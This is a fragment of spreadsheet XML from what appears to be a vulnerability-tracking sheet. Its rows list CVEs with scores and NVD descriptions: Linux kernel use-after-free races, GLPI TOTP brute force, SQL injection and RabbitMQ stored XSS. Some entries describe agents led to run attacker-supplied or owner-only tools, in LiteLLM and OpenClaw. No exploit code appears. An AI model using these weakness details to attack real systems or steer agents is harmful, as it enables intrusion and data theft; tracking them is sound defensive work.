      <c r="Q116" s="5" t="inlineStr"/>
      <c r="R116" s="5" t="inlineStr"/>
      <c r="S116" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: Remove conflicting altnames for dying netns in __dev_change_net_namespace().
syzbot reported the warning in cfg80211_pernet_exit(). [0]
The repro does the following:
  1. create two device in root netns and non-root netns
  2. assign the same altname for the two devices
  3. remove the non-root netns
Since commit 7663d522099e ("net: check for altname conflicts
when changing netdev's netns"), cfg80211_switch_netns() and
cfg802154_switch_netns() fail if init_net has a device with the
conflicting altname.
default_device_exit_net() had the same issue and commit d09486a04f5d
("net: fix removing a namespace with conflicting altnames") fixed it.
cfg80211_pernet_exit() and cfg802154_pernet_exit() need the same fix.
Let's generalise the fix by removing conflicting altnames for dying
netns in __dev_change_net_namespace().
[0]:
cfg80211_switch_netns(rdev, &amp;init_net)
WARNING: net/wireless/core.c:1871 at cfg80211_pernet_exit+0xd5/0x120 net/wireless/core.c:1871, CPU#1: kworker/u8:9/1160
Modules linked in:
CPU: 1 UID: 0 PID: 1160 Comm: kworker/u8:9 Not tainted syzkaller #0 PREEMPT(full)
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/24/2026
Workqueue: netns cleanup_net
RIP: 0010:cfg80211_pernet_exit+0xd5/0x120 net/wireless/core.c:1871
Code: e8 03 42 80 3c 20 00 74 08 4c 89 f7 e8 b4 ef 0e f7 4d 8b 36 49 81 fe 20 10 4a 90 74 12 e8 03 3d 9f f6 eb 85 e8 fc 3c 9f f6 90 &lt;0f&gt; 0b 90 eb cc e8 f1 3c 9f f6 eb 05 e8 ea 3c 9f f6 5b 41 5c 41 5e
RSP: 0018:ffffc900057a78f0 EFLAGS: 00010293
RAX: ffffffff8b287154 RBX: ffff88807ba72780 RCX: ffff8880213e8000
RDX: 0000000000000000 RSI: 00000000ffffffef RDI: 0000000000000000
RBP: 00000000ffffffef R08: ffffffff9024cc67 R09: 0000000000000000
R10: fffff52000af4eb0 R11: fffffbfff204998d R12: dffffc0000000000
R13: ffffffff904a1080 R14: ffff888144ed0008 R15: ffff888144ed0e20
FS:  0000000000000000(0000) GS:ffff888124de6000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00005642de0a8a70 CR3: 000000007a40c000 CR4: 00000000003526f0
Call Trace:
 &lt;TASK&gt;
 ops_exit_list net/core/net_namespace.c:200 [inline]
 ops_undo_list+0x43d/0x8d0 net/core/net_namespace.c:253
 cleanup_net+0x572/0x810 net/core/net_namespace.c:706
 process_one_work kernel/workqueue.c:3387 [inline]
 process_scheduled_works+0xc3d/0x1630 kernel/workqueue.c:3470
 worker_thread+0xa47/0xfb0 kernel/workqueue.c:3551
 kthread+0x38b/0x480 kernel/kthread.c:436
 ret_from_fork+0x514/0xb70 arch/x86/kernel/process.c:158
 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245
 &lt;/TASK&gt;</t>
        </is>
      </c>
      <c r="T116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98073</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98112</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="inlineStr"/>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr"/>
      <c r="K117" s="5" t="inlineStr"/>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q117" s="5" t="inlineStr"/>
      <c r="R117" s="5" t="inlineStr"/>
      <c r="S117" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: fix listener task lifetime on netdev events
The listener thread exits when its listening socket is shutdown. The
netdevice notifier shuts down the socket before calling kthread_stop(), so
the task_struct can be freed before kthread_stop() gets its reference.
Create the listener in a stopped state and hold an extra task_struct
reference until kthread_stop_put() completes. Also stop and release
listeners before freeing their interface records during TCP teardown.</t>
        </is>
      </c>
      <c r="T117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98112</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98116</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="inlineStr"/>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr"/>
      <c r="K118" s="5" t="inlineStr"/>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q118" s="5" t="inlineStr"/>
      <c r="R118" s="5" t="inlineStr"/>
      <c r="S118" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: pcm: Serialize PCM mmap with buffer reallocation to fix page UAF
snd_pcm_hw_params() and snd_pcm_hw_free() guard buffer reallocation
with an mmap_count check performed under the PCM stream lock, but the
lock is released long before the buffer is actually freed:
snd_pcm_sync_stop(), constraint refinement and do_free_pages() all
happen in between.  snd_pcm_mmap_data(), on the other hand, takes no
lock at all: it validates against the old buffer's state and
dma_bytes, remaps its pages into the VMA, and only then increments
mmap_count.
A concurrent mmap() can therefore slip in between the check and the
free.  remap_pfn_range() installs writable PTEs for the old buffer's
pages without taking page references, and the subsequent
do_free_pages() returns those pages to the page allocator while the
VMA still maps them.  This leaves a stale, writable mapping of freed
pages: a page-level use-after-free that can be leveraged for local
privilege escalation.
Make snd_pcm_mmap_data() participate in the buffer-access scheme
introduced for hw_params/hw_free: acquire runtime-&gt;buffer_accessing
before validating and remapping, and release it afterwards.  Buffer
reallocation already fails with -EBUSY while accessors are active,
and the mmap side now fails with -EBUSY while a reallocation is in
progress, so the validate/remap sequence and the check/free sequence
can no longer interleave.
A reproducer that turns this race into a stale writable mapping of
the freed DMA buffer pages is available on request.</t>
        </is>
      </c>
      <c r="T118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98116</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98122</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="inlineStr"/>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr">
        <is>
          <t>express</t>
        </is>
      </c>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q119" s="5" t="inlineStr"/>
      <c r="R119" s="5" t="inlineStr"/>
      <c r="S119" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vxlan: mdb: Fix use-after-free in vxlan_mdb_remote_src_del()
vxlan_mdb_is_valid_source(), which validates MDBE_ATTR_SOURCE and every
MDBE_ATTR_SRC_LIST member, accepts the all-zeros address.
A source list is only accepted on a (*, G) entry, whose source is the
all-zeros address, and for each member of the list an (S, G) entry is
derived from it by substituting the source. Entries are keyed by a plain
memcmp() of struct vxlan_mdb_entry_key, so if MDBE_ATTR_SOURCE is present
and holds the all-zeros address and the source list holds it as well, the
derived (S, G) key is byte-identical to the (*, G) key and resolves to the
same entry. Omitting MDBE_ATTR_SOURCE is not equivalent, as the key is
then left with a zero address family.
vxlan_mdb_remote_src_del() removes the forwarding entry of a source before
freeing the source entry:
	vxlan_mdb_remote_src_fwd_del(vxlan, group, remote, &amp;ent-&gt;addr);
	vxlan_mdb_remote_src_entry_del(ent);
With the keys aliased, the first call deletes the remote of the entry that
owns 'ent' instead of a separate (S, G) entry, and frees 'ent'. The second
call then runs on the freed entry, and its hlist_del() reads -&gt;pprev and
-&gt;next out of it and writes through them.
Adding the (*, G) entry with NLM_F_REPLACE and no source list marks the
all-zeros source for deletion and reaches this from the sweep at the end
of vxlan_mdb_remote_srcs_replace().
  BUG: KASAN: slab-use-after-free in __vxlan_mdb_add+0x1cd/0xd70
  Read of size 8 at addr ffff888102852500 by task poc/84
   __vxlan_mdb_add+0x1cd/0xd70
   vxlan_mdb_add+0xc0/0x140
   rtnl_mdb_add+0x157/0x2a0
   rtnetlink_rcv_msg+0x207/0x5a0
  Allocated by task 84:
   __kmalloc_cache_noprof+0x153/0x360
   vxlan_mdb_remote_srcs_add+0x2eb/0x440
   __vxlan_mdb_add+0x803/0xd70
  Freed by task 84:
   kfree+0x14c/0x3b0
   vxlan_mdb_remote_del+0x129/0x1a0
   __vxlan_mdb_del+0x4f/0xe0
   vxlan_mdb_remote_src_fwd_del.isra.0+0x162/0x1b0
   __vxlan_mdb_add+0x1c5/0xd70
The MDB operations are netns-scoped, so an unprivileged user can perform
them in a new user and network namespace.
Reject the all-zeros address in vxlan_mdb_is_valid_source(), which covers
both call sites. A (*, G) entry is expressed by omitting the source, so
nothing legitimate is refused.
Discovered by XBOW, triaged by Baul Lee &lt;baul.lee@xbow.com&gt;</t>
        </is>
      </c>
      <c r="T119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98122</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98143</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="inlineStr"/>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr"/>
      <c r="K120" s="5" t="inlineStr"/>
      <c r="L120" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q120" s="5" t="inlineStr"/>
      <c r="R120" s="5" t="inlineStr"/>
      <c r="S120" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel: ethosu: Don't read the U65 rounding mode as a storage mode
Bits 15:14 of NPU_SET_{IFM,OFM}_PRECISION select the activation storage
mode on U85 only. On U65 the same field holds the rounding mode, and the
command stream parser has read it as a storage mode since the driver was
added.
That went unnoticed while unknown values fell through the switch, but
now that they are rejected, every U65 command stream that asks for
natural rounding (2) fails CMDSTREAM_BO_CREATE with -EINVAL. Mesa emits
it for average pooling, concatenation, split, unpack, strided slice, LUT
and argmax, which is 72 failures of the Teflon test suite on an i.MX93.
Truncating rounding (1) is misread as well: it picks the two-tile
address path and computes a bogus feature map size from tile bases the
command stream never set.
Read the field as a storage mode only on the hardware where it is one.</t>
        </is>
      </c>
      <c r="T120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98143</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98156</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="inlineStr"/>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K121" s="5" t="inlineStr"/>
      <c r="L121" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q121" s="5" t="inlineStr"/>
      <c r="R121" s="5" t="inlineStr"/>
      <c r="S121" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/virtio: use the DMA API for resource backing on Xen
On a Xen PV domain page addresses bear no relation to the real machine
addresses the host would have to use to reach it.
virtio_ring.c handles this correctly, vring_use_map_api() returns true
for any xen_domain() regardless of VIRTIO_F_ACCESS_PLATFORM.
virtio-gpu makes the same decision independently, but its copy
looks only at the feature bit:
	bool use_dma_api = !virtio_has_dma_quirk(vgdev-&gt;vdev);
QEMU does not set iommu_platform on virtio-vga by default, so
VIRTIO_F_ACCESS_PLATFORM is not negotiated, use_dma_api is false, and
virtio_gpu_object_shmem_init() describes the framebuffer's backing pages
to the host with sg_phys().  Those are guest-physical addresses. In a PV
domain they resolve, on the host side, to pages belonging to some other
domain, so the host scans out unrelated memory.
Move the decision into virtio_gpu_use_dma_api() and give it the
xen_domain() check, like vring_use_map_api() has. This
additionally enables the dma_sync_sgtable_for_device() calls in
virtgpu_vq.c, which are required for correctness whenever swiotlb
is in play.
Reproduced with a Xen 4.21 PV dom0 nested inside QEMU 8.2 with
virtio-vga, on both a distro 6.8 kernel and 6.18 LTS. A PVH dom0
works fine and doesn't need this fix because it is identity-mapped,
only PV dom0s are affected.</t>
        </is>
      </c>
      <c r="T121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98156</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49470</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="inlineStr"/>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr"/>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q122" s="5" t="inlineStr"/>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="S122" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 11.0.0 until 11.0.8, the time-based one-time password verification endpoint does not limit failed submissions per user. An attacker who has obtained a user's primary authentication credentials can repeatedly submit TOTP values against the MFA verification flow, making brute-force compromise of the second factor and subsequent account takeover possible. This issue is fixed in version 11.0.8.</t>
        </is>
      </c>
      <c r="T122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49470</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89032</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="inlineStr"/>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr"/>
      <c r="K123" s="5" t="inlineStr"/>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q123" s="5" t="inlineStr"/>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S123" s="5" t="inlineStr">
        <is>
          <t>BerriAI LiteLLM before 1.101.0-rc.1 contains a tenant isolation bypass vulnerability in the semantic cache layer that allows authenticated users to read other tenants' cached responses by exploiting a metadata key mismatch between _get_semantic_cache_tenant_scope() and _get_metadata_variable_name(). Attackers holding a valid virtual key can submit semantically similar prompts on affected routes such as /v1/responses and /bedrock/* to retrieve cached responses containing other tenants' personally identifiable information, financial data, or source code, and can cause agentic front-ends to auto-execute attacker-supplied tool calls under victim credentials by returning cached function_call or tool_calls payloads to a different principal.</t>
        </is>
      </c>
      <c r="T123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89032</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100578</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="inlineStr"/>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K124" s="5" t="inlineStr"/>
      <c r="L124" s="5" t="inlineStr"/>
      <c r="M124" s="5" t="inlineStr"/>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q124" s="5" t="inlineStr"/>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S124" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package `openclaw`) before 2026.7.1 fails to restrict owner-only infrastructure tools exposed through the chat.send endpoint. In Gateway deployments using authentication modes that honor caller identity and narrower operator scopes, a write-scoped non-owner caller can start a chat turn whose tool inventory includes the `gateway` and `cron` tools, causing the agent to invoke owner-only configuration or scheduling operations, including persistent state changes. Practical impact depends on the tools selected by the model and the caller's ability to steer the turn. Shared-secret token and password callers are treated as fully trusted operators under OpenClaw's security model and are outside the scope of this issue. The issue is fixed in 2026.7.1; as a workaround, restrict chat.send to administrators in identity-bearing deployments and remove `gateway` and `cron` from affected agent tool policies.</t>
        </is>
      </c>
      <c r="T124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100578</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100579</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="inlineStr"/>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K125" s="5" t="inlineStr"/>
      <c r="L125" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q125" s="5" t="inlineStr"/>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S125" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.7.1 incorrectly trusts requester provenance in message.action. In identity-bearing Gateway deployments (authentication modes that honor caller identity and narrower operator scopes), a write-scoped caller can supply another sender's identifier to the channel authorization checks and invoke a channel action under that spoofed requester identity, reaching operations the channel adapter would have denied to the real caller. Practical impact depends on the enabled channel, the action, and the target account's permissions. Shared-secret token and password callers are full trusted operators under OpenClaw's security model and are out of scope. The issue is fixed in 2026.7.1; as a workaround, restrict message.action to administrators and disable sensitive channel actions that rely on requester identity.</t>
        </is>
      </c>
      <c r="T125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100579</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67239</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="inlineStr"/>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K126" s="5" t="inlineStr"/>
      <c r="L126" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q126" s="5" t="inlineStr"/>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S126" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.18 and 4.0.23 and 4.1.14 and 4.2.9 and 4.3.3, Stored XSS via TLS peer-certificate DN in stream-management UI (sibling of V-11). lines 102/106/110 render peercertsubject / peercertissuer with raw &lt;%= %&gt; and no fmtstring(). RFC4514 backslash-escaping of &lt;/&gt; is HTML-inert and bypassable (&lt;img ... //&gt;). Requires non-default config: a stream TLS listener with verifypeer and an attacker-obtainable trusted cert with a malicious Same as the connection.ejs finding, against operators viewing the stream-connection detail rabbitmqstream + rabbitmqstreammanagement enabled with a TLS listener using verifypeer Attacker can obtain a certificate signed by a CA the listener trusts, with attacker-chosen DN An operator views the. This issue is fixed in versions 3.13.18 and 4.0.23 and 4.1.14 and 4.2.9 and 4.3.3.</t>
        </is>
      </c>
      <c r="T126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67239</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84893</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="inlineStr"/>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr"/>
      <c r="K127" s="5" t="inlineStr"/>
      <c r="L127" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q127" s="5" t="inlineStr"/>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S127" s="5" t="inlineStr">
        <is>
          <t>IBM Guardium Data Protection 12.2 is vulnerable to SQL injection in the PESI service. An authenticated attacker could exploit this vulnerability to access sensitive information in the internal database.</t>
        </is>
      </c>
      <c r="T127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84893</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100208</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="inlineStr"/>
